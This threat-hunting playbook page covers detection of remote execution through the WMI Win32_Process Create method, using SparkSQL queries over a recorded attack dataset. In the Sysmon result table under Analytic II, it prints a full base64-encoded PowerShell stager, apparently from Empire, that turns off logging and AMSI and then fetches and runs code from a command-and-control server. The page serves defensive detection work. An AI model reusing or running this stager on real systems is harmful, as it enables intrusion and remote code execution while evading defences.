WMI Win32_Process Class and Create Method for Remote Execution

Metadata

id

WIN-190810201010

author

Roberto Rodriguez @Cyb3rWard0g

creation date

2019/08/10

platform

Windows

playbook link

Technical Description

WMI is the Microsoft implementation of the Web-Based Enterprise Management (WBEM) and Common Information Model (CIM). Both standards aim to provide an industry-agnostic means of collecting and transmitting information related to any managed component in an enterprise. An example of a managed component in WMI would be a running process, registry key, installed service, file information, etc. At a high level, Microsoft’s implementation of these standards can be summarized as follows > Managed Components Managed components are represented as WMI objects — class instances representing highly structured operating system data. Microsoft provides a wealth of WMI objects that communicate information related to the operating system. E.g. Win32_Process, Win32_Service, AntiVirusProduct, Win32_StartupCommand, etc.

One well known lateral movement technique is performed via the WMI object — class Win32_Process and its method Create. This is because the Create method allows a user to create a process either locally or remotely. One thing to notice is that when the Create method is used on a remote system, the method is run under a host process named “Wmiprvse.exe”.

The process WmiprvSE.exe is what spawns the process defined in the CommandLine parameter of the Create method. Therefore, the new process created remotely will have Wmiprvse.exe as a parent. WmiprvSE.exe is a DCOM server and it is spawned underneath the DCOM service host svchost.exe with the following parameters C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p. From a logon session perspective, on the target, WmiprvSE.exe is spawned in a different logon session by the DCOM service host. However, whatever is executed by WmiprvSE.exe occurs on the new network type (3) logon session created by the user that authenticated from the network.

Additional Reading

  • https://github.com/hunters-forge/ThreatHunter-Playbook/tree/master/docs/library/logon_session.md

Hypothesis

Adversaries might be leveraging WMI Win32_Process class and method Create to execute code remotely across my environment

Analytics

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/hunters-forge/mordor/master/datasets/small/windows/execution/empire_invoke_wmi.tar.gz"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] Processing Data from Winlogbeat version 6..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Analytic I

FP Rate

Log Channel

Description

Medium

[‘Security’]

Look for wmiprvse.exe spawning processes that are part of non-system account sessions.

df = spark.sql(
    '''
SELECT `@timestamp`, computer_name, SubjectUserName, TargetUserName, NewProcessName, CommandLine
FROM mordorTable
WHERE channel = "Security"
    AND event_id = 4688
    AND lower(ParentProcessName) LIKE "%wmiprvse.exe"
    AND NOT TargetLogonId = "0x3e7"
    '''
)
df.show(10,False)
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+
|@timestamp            |computer_name   |SubjectUserName|TargetUserName|NewProcessName                                           |CommandLine|
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+
|2019-03-19 15:31:56.94|HFDC01.shire.com|HFDC01$        |Mmidge        |C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|null       |
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+

Analytic II

FP Rate

Log Channel

Description

Medium

[‘Microsoft-Windows-Sysmon/Operational’]

Look for wmiprvse.exe spawning processes that are part of non-system account sessions.

df = spark.sql(
    '''
SELECT `@timestamp`, computer_name, User, Image, CommandLine
FROM mordorTable
WHERE channel = "Microsoft-Windows-Sysmon/Operational"
    AND event_id = 1
    AND lower(ParentImage) LIKE "%wmiprvse.exe"
    AND NOT LogonId = "0x3e7"
    '''
)
df.show(10,False)
+-----------------------+----------------+------------+---------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|@timestamp             |computer_name   |User        |Image                                                    |CommandLine                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        |
+-----------------------+----------------+------------+---------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|2019-03-19 15:31:56.948|HFDC01.shire.com|SHIRE\Mmidge|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\WindowsPowershell\v1.0\powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAFIAcwBJAG8ATgBUAEEAYgBsAEUALgBQAFMAVgBFAHIAcwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJAA5AGYAMwA9AFsAUgBlAGYAXQAuAEEAUwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAEkAZQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAA5AEYAMwApAHsAJAAwADUARgA9ACQAOQBGADMALgBHAEUAVABWAGEATABVAGUAKAAkAE4AdQBMAEwAKQA7AEkAZgAoACQAMAA1AEYAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAAwADUARgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAwADUAZgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBMAD0AWwBDAE8ATABsAGUAYwBUAGkATwBuAFMALgBHAGUATgBFAFIASQBDAC4ARABpAEMAdABJAE8ATgBhAFIAWQBbAFMAVABSAGkATgBnACwAUwB5AFMAdABFAE0ALgBPAGIASgBFAEMAVABdAF0AOgA6AG4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAAwADUAZgBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABTAEUAewBbAFMAQwByAEkAUAB0AEIAbABPAGMASwBdAC4AIgBHAGUAVABGAEkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAdQBlACgAJABOAFUAbABMACwAKABOAGUAVwAtAE8AQgBqAEUAYwB0ACAAQwBPAEwAbABlAGMAdABpAG8ATgBzAC4ARwBlAE4ARQBSAEkAQwAuAEgAYQBTAGgAUwBFAHQAWwBTAHQAUgBpAE4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBlAE0AYgBMAFkALgBHAEUAVABUAFkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApADsAJABSAEUAZgAuAEcARQBUAEYAaQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAGwAdQBlACgAJABuAFUATABMACwAJAB0AHIAVQBFACkAOwB9ADsAWwBTAHkAcwB0AEUATQAuAE4AZQBUAC4AUwBFAFIAVgBpAGMAZQBQAE8ASQBOAFQATQBBAE4AQQBnAEUAcgBdADoAOgBFAHgAUABlAGMAdAAxADAAMABDAE8ATgBUAEkAbgBVAGUAPQAwADsAJAAxADcANwA9AE4ARQBXAC0ATwBCAEoARQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBMAEkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQAMQA3ADcALgBIAGUAQQBkAEUAcgBzAC4AQQBEAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAAxADcANwAuAEgARQBBAEQAZQBSAHMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkADEANwA3AC4AUAByAG8AWABZAD0AWwBTAFkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAGIAUgBFAFEAVQBlAFMAVABdADoAOgBEAEUAZgBhAFUAbABUAFcARQBCAFAAUgBPAHgAeQA7ACQAMQA3ADcALgBQAHIAbwB4AHkALgBDAFIARQBEAEUAbgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAUwB0AGUAbQAuAE4ARQBUAC4AQwByAEUAZABFAG4AVABpAGEATABDAEEAQwBoAEUAXQA6ADoARABlAEYAYQB1AEwAdABOAEUAdAB3AE8AcgBLAEMAcgBFAGQAZQBOAFQASQBhAEwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAAxADcANwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAdABFAE0ALgBUAGUAWABUAC4ARQBOAEMAbwBkAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAfgBrACoAXwBGAFMAagByADgAJQB4AHcAZQBKADYAaAB8AFAASwAuAGYAewBVAE4ATQBIAHUAZABwADUAeQBtACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAkACgAWwBUAGUAWABUAC4ARQBuAGMATwBkAEkAbgBHAF0AOgA6AFUAbgBJAEMAbwBkAGUALgBHAEUAVABTAHQAcgBpAG4ARwAoAFsAQwBPAG4AdgBFAFIAVABdADoAOgBGAHIATwBtAEIAYQBzAEUANgA0AFMAdABSAGkAbgBHACgAJwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQB1AEEARABBAEEATABnAEEAeABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAGcAQQA9ACcAKQApACkAOwAkAHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkADEANwA3AC4ASABlAEEARABlAFIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBIAFkAdgBsAFAASgBNAG0AcwBrAHkATgBGAFQAawA9AGEAcQBHAGIANQA3AHAAaABKAEUAVgBaAFoAVQBmAFcATAB0AFQAVQBkAGkAUgA4AHAAWQBZAD0AIgApADsAJABEAEEAVABBAD0AJAAxADcANwAuAEQATwBXAE4AbABPAEEARABEAEEAVABhACgAJABzAEUAcgArACQAVAApADsAJABpAHYAPQAkAGQAQQBUAEEAWwAwAC4ALgAzAF0AOwAkAGQAYQBUAEEAPQAkAEQAQQBUAGEAWwA0AC4ALgAkAGQAYQB0AEEALgBsAEUAbgBnAHQAaABdADsALQBqAG8ASQBuAFsAQwBoAEEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==|
+-----------------------+----------------+------------+---------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Analytic III

FP Rate

Log Channel

Description

Low

[‘Security’]

Look for non-system accounts leveraging WMI over the netwotk to execute code

df = spark.sql(
    '''
SELECT o.`@timestamp`, o.computer_name, o.SubjectUserName, o.TargetUserName, o.NewProcessName, o.CommandLine, a.IpAddress
FROM mordorTable o
INNER JOIN (
    SELECT computer_name,TargetUserName,TargetLogonId,IpAddress
    FROM mordorTable
    WHERE channel = "Security"
        AND LogonType = 3
        AND IpAddress is not null
        AND NOT TargetUserName LIKE "%$"
    ) a
ON o.TargetLogonId = a.TargetLogonId
WHERE o.channel = "Security"
    AND o.event_id = 4688
    AND lower(o.ParentProcessName) LIKE "%wmiprvse.exe"
    AND NOT o.TargetLogonId = "0x3e7"
    '''
)
df.show(10,False)
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+-------------+
|@timestamp            |computer_name   |SubjectUserName|TargetUserName|NewProcessName                                           |CommandLine|IpAddress    |
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+-------------+
|2019-03-19 15:31:56.94|HFDC01.shire.com|HFDC01$        |Mmidge        |C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|null       |172.18.39.105|
+----------------------+----------------+---------------+--------------+---------------------------------------------------------+-----------+-------------+

Detection Blindspots

Hunter Notes

  • Stack the child processes of wmiprvse.exe in your environment. This is very helpful to reduce the number of false positive and understand your environment. You can categorize the data returned by business unit.

  • Look for wmiprvse.exe spawning new processes that are part of a network type logon session.

  • Enrich events with Network Logon events (4624 - Logon Type 3)

Hunt Output

Category

Type

Name

signature

SIGMA

sysmon_wmi_module_load

References

  • https://posts.specterops.io/threat-hunting-with-jupyter-notebooks-part-4-sql-join-via-apache-sparksql-6630928c931e

  • https://posts.specterops.io/real-time-sysmon-processing-via-ksql-and-helk-part-3-basic-use-case-8fbf383cb54f